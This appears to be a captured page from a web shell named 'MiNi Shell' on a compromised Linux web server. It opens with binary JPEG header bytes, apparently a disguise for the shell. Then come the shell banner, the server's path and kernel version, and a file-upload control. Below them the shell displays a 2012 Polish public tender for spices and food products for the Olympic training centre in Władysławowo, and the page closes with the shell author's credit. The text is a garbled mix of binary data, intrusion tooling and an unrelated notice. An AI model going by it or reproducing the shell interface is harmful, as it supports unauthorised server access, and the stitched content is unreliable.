JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120321/88716-N-2012.html

<p class="kh_header"><b>Władysławowo: Dostawy sukcesywne przypraw,  półproduktów i przetworów
do  Ośrodka Przygotowań Olimpijskich we Władysławowie</b><br>
<b>Numer ogłoszenia: 88716 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sukcesywne przypraw,  półproduktów i przetworów
do  Ośrodka Przygotowań Olimpijskich we Władysławowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia są  sukcesywne dostawy przypraw,  półproduktów i przetworów przez okres 6 miesięcy, na potrzeby działu gastronomii w 
 Ośrodku Przygotowań Olimpijskich we Władysławowie. Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2010 r. Nr 113 poz. 759 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.24.00-5, 15.87.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Jeżeli z upływem 6 miesięcy od dnia podpisania  umowy kwota określona w ust. 1  zawartej umowy pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
2.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych). 
3.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej i wielkości opakowania) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 10:00, miejsce: Siedziba Zamawiającego ul. Żeromskiego 52, 84-120 Władysławowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rosoły, zupy, sosy, dresingi, tłuszcze, dodatki do dań, desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy przypraw, półproduktów i przetworów  tj. rosoły, zupy, sosy, dresingi, tłuszcze, dodatki do dań, desery 

1.	ROSÓŁ WOŁOWY (w paście) 	kg	3
2.	ROSÓŁ Z KURY (w paście) - 	kg	3
3.	ROSÓŁ Z KURY (w proszku) - 	kg	3
4.	ROSÓŁ JARZYNOWY (proszku) barwników  	kg	10
5.	ROSÓŁ Z KURY (w proszku) - 	kg	10
6.	BULION GRZYBOWY - 	kg	5
7.	ZUPA KREM Z BOROWIKÓW -                                    	kg	3
8.	ZUPA SZPARAGOWA -                     	kg	4
9.	BARSZCZ CZERWONY  -                                	kg	10
10.	FOND z owoców morza w paście  kg	5
11.	SOS Demi-Glace - 	kg	10
12.	SOS PIECZENIOWY -( 	kg	10
13.	SOS PIECZENIOWY O SMAKU DROBIOWYM 	kg	10
14.	SOS CAFE DE PARIS  kg	4
15.	SOS ŚRÓDZIEMNOMORSKI  -  kg	6
16.	SOS z czerwonego wina  -     	kg	6
17.	SOS CYTRYNOWO-MAŚLANY -   kg	4
18.	SOS CHILI SŁODKO-PIKANTNY - kg	4
19.	SOS Z ZIELONYM PIEPRZEM - 	kg	3
20.	FIX DO POTRAW CHIŃKICH -  kg	4
21.	GRZANKI ZIOŁOWO-CZOSNKOWE-kg	8
22.	GROSZEK PTYSIOWY- kg	8
23.	Cebula smażona - cebulka opakowanie 	kg	1
24.	SOS SAŁATKOWY, KOPERKOWY    	kg	3
25.	SOS SAŁATKOWY, OGRODOWY kg	3
26.	SOS SAŁATKOWY, WŁOSKI - kg	3
27.	SOS SAŁATKOWY, GRECKI - 	kg	3
28.	TOMATO PRONTO -30
29.	KONCENTRAT POMIDOROWY 30% -  kg	120
30.	Pomidory bez skórki -	kg	120
31.	PRIMERBA  BAZYLIOWA -  kg	2
32.	PRIMERBA  CZERWONE PESTO - kg	2
33.	PRIMERBA  GRZYBOWA -kg	2
34.	PRIMERBA  PESTO - kg	2
35.	PRIMERBA  PROWANSALSKA kg	2
36.	Zasmażka jasna - kg	5
37.	Zasmażka ciemna - kg	5
38.	SOS SAŁATKOWY BAZYLIOWO-CZOSNKOWY-kg	4
39.	ESENCJA Z WOŁOWINY LUB KURY, LUB CIELĘCINY-	litr	4
40.	Sos BARBECUE- opakowanie 	kg	4
41.	SOS HOLENDERSKI 	kg	4
42.	SOS CZTERY SERY z brokułami -kg	4
43.	Rama Cremefine Profi do zup i sosów litr	40
44.	Rama Cremefine Profi do zup i sosówlitr	40
45.	Rama Creme Fraiche Profi do zup i sosów litr	40
46.	Rama jednoporcjowy tłuszcz do smarowania opakowanie zbiorcze 200 szt szt	10
47.	Rama - Combi Profi szt	3
48.	Pieprz zielony w zalewie -kg	2
49.	Kapary w zalewie - kg	2
50.	Zakwas do żurku - litr	100
51.	AUSZPIK-opakowanie eurokontener  kg	16
52.	MUS CZEKOLADOWY szt	20
53.	MUS JOGURTOWY-szt	30
54.	POLEWY OWOCOWE DO LODÓW szt	20
55.	POLEWA CZEKOLADOWA DO LODÓW szt	10
56.	TIRAMISU - 	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.24.00-5, 15.87.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przyprawy jednolite i mieszane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy - przyprawy jednolite i mieszane  tj. 1.	DELIKAT DO RYB kg	7
2.	MARYNATA PREMIUM -kg	4
3.	MARYNATA PREMIUM-Knorr kg	4
4.	MARYNATA PREMIUM-  kg	6
5.	MARYNATA PREMIUM-kg	5
6.	ZIOŁA PROWANSALSKIE -kg	3
7.	ROZMARYN kg	2
8.	CZOSNEK GRANULOWANY- kg	3
9.	MAJERANEK SUSZONY kg	5
10.	BAZYLIA kg	5
11.	TYMIANEK kg	2
12.	KURKUMA -kg	2
13.	PAPRYKA SŁODKA, MIELONA	kg	5
14.	PIEPRZ BIAŁY, MIELONY-kg	5
15.	PIEPRZ CZARNY, MIELONY  kg	10
16.	Pieprz Cytrynowy 	kg	2
17.	LIŚĆ LAUROWY opakowanie kg	2
18.	PIEPRZ CZARNY, CAŁY	kg	3
19.	PIEPRZ KOLOROWY, CAŁY-kg	2
20.	PIEPRZ KOLOROWY MŁOTKOWANY kg	3
21.	ZIELE ANGIELSKIE- opakowanie PET 350-800g  kg	4
22.	SÓL WARZONA JODOWANA  kg	250
23.	Kwasek cytrynowy - kg	2
24.	Przyprawa Szefa Kuchni -	kg	50
25.	Cynamon mielony - kg	1
26.	Szafran opakowanie  	szt	2
27.	Oregano - opakowanie kg	1
28.	Kminek - opakowanie kg	1
29.	Gorczyca - opakowanie 	kg	1
30.	Curry - opakowanie kg	1
31.	MARYNATA STAROPOLSKA do mięsa i drobiu kg	4
32.	Przyprawa do flaków - kg	3
33.	Sól zmiękczająca mięso - kg	5
34.	WANILIA LASKA - szt	5
35.	CHILI -kg	2
36.	Papryka mielona ostra 	kg	2
37.	Owoc jałowca kg	1
38.	Gruboziarnista posypka do mięś -kg	2
39.	Gałka muszkatałowa kg	1
40.	Kmin Rzymski - kg	1
41.	Goździki -	kg	1
42.	Delikat przyprawa do grilla kg	6
43.	Delikat przyprawa w płynie kg	40
44.	Placki Ziemniaczane w proszku 	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.12.60-4, 15.89.10.00-0, 15.87.24.00-5, 15.87.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przyprawy i dodatki różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyprawy i dodatki różne tj. 1.	Liście SUSHI NORI GOLD szt.	6
2.	Sezam Czarny - kg	1
3.	Sezam biały - 	kg	1
4.	Nitki chili - Cienkie nitki uzyskane z suszonego chilli kg	0,5
5.	Ocet ryżowy - litr	4
6.	Pasta WASABI -	kg	1
7.	Sos sojowy - litr	5
8.	Sos sojowy ciemny 	litr	2
9.	Sos rybny Oyster Brand szt	10
10.	Trawa cytrynowa suszona lub w paście kg	2
11.	Imbir marynowany różowy lub biały do sushi kg	3
12.	Sos Mango -Jalapeno opakowanie 	kg	3
13.	Sos Worcestershire -szt	10
14.	Mleczko kokosowe -litr	24
15.	Pasta Curryy czerwona, zółta, zielona -kg	4
16.	Pasta Tom yum kg	4
17.	Pasta Tamaryndowa kg	1,5
18.	Wino do gotowania - litr	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.24.00-5, 15.87.24.00-5, 15.89.10.00-0, 15.87.12.60-4, 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com